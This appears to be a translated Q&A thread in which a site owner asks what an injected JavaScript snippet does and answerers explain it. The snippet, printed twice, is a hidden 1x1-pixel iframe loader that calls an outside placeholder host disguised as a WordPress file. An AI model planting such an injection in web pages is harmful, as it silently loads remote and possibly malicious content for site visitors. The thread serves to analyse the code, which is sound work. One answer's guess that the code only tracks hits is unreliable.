这个恶意javascript代码到底在做什么?
(function () {
var qk = document.createElement('iframe');
qk.src = 'http://xxx.tld/wp-includes/dtd.php';
qk.style.position = 'absolute';
qk.style.border = '0';
qk.style.height = '1px';
qk.style.width = '1px';
qk.style.left = '1px';
qk.style.top = '1px';
if (!document.getElementById('qk')) {
document.write('<div id=\'qk\'></div>');
document.getElementById('qk').appendChild(qk);
}
})();
http://xxx.tld/wp-includes/dtd.php
的网站只返回确定。
答案 0 :(得分:4)
是:
(function () {
var qk = document.createElement('iframe'); // creating an iframe
qk.src = 'http://xxx.tld/wp-includes/dtd.php'; // pointing it at a webpage
/*
making the iframe only take up a 1px by 1px square
in the top left-hand corner of the web page it is injected into
*/
qk.style.position = 'absolute';
qk.style.border = '0';
qk.style.height = '1px';
qk.style.width = '1px';
qk.style.left = '1px';
qk.style.top = '1px';
/*
Adding the iframe to the DOM by creating a <div> with an ID of "qt"
(If the div has not been created already)
*/
if (!document.getElementById('qk')) {
document.write('<div id=\'qk\'></div>');
document.getElementById('qk').appendChild(qk);
}
})();
当iframe注入DOM时,浏览器会向http://xxx.tld/etc
发出请求。这很有可能是为了跟踪您网站上的点击量。
答案 1 :(得分:0)
它打开一个iframe并运行一个php脚本。
哪个可能包含谁知道什么。
此外,似乎需要存在id为qk的div。 也许要注入其他不好的代码。